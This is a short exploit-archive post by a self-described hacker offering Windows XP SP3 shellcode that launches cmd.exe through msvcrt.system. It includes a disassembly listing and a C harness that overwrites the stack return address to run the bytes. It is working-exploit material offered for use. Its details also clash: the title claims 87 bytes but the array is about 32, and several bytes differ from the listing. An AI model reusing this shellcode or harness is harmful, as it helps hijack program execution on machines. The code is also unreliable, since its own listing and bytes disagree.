win32/xp sp3 (ENG) cmd.exe Sellcode 87 bytes

# Title : windows/XP sp3 (ENG) cmd.exe Sellcode
# Author :TrOoN
# E-mail : [email protected]  | www.facebook.com/fysl.fyslm
# Home : city 617 logts  : Draria . algeria
# Web Site : www.1337day.com
# platform : winDows xp SP3      |  tESTED IN WINDWOS XP SP 3 work
# Type : SHELL CODe WINDWOS
# WARNING : i teste in windows Xp sp3 (ENG) not windwos 7 or windwos sp2 :( thank you ....
###


00402000   8BEC             MOV EBP,ESP
00402002   33FF             XOR EDI,EDI
00402004   57               PUSH EDI
00402005   C645 FC 63       MOV BYTE PTR SS:[EBP-4],63
00402009   C645 FD 6D       MOV BYTE PTR SS:[EBP-3],6D
0040200D   C645 FE 64       MOV BYTE PTR SS:[EBP-2],64
00402011   C645 F8 01       MOV BYTE PTR SS:[EBP-8],1
00402015   8D45 FC          LEA EAX,DWORD PTR SS:[EBP-3]
00402018   50               PUSH EAX
00402019   B8 C793BF77      MOV EAX,msvcrt.system
0040201E   FFD0             CALL EAX
*/

#include "stdio.h"
unsigned char shellcode[] =
"\x8B\xEC\x33\xFF\x57"
"\xC6\x45\xFC\x63\xC6\x45"
"\xFD\x6D\xC6\x45\xFE\x64"
"\xC4\x45\xF8\x01\x8D"
"\x45\xFC\x50\xB8\xC7\x93"
"\xBF\x77\xFF\xD0";
int main ()
{
int *ret;
ret=(int *)&ret+3;
printf("Shellcode print is : %d\n",strlen(shellcode));
(*ret)=(int)shellcode;
return 0;
}
                  ######################################### TrOon #######################################
                  
                  thankX to : 1337day | bRescO-dZ (cousin) | security-ray | Turk hack | exploit-tuRK | 78/40 | team_mosta | hacker_fire | viper
                  
                  elit_Tr0Jen | hacker_1420 | Algérien de la Garde Républicaine all memmber | indoushka ( spicial respect)


                                                                        ALL algeria haXor  & nasrin <3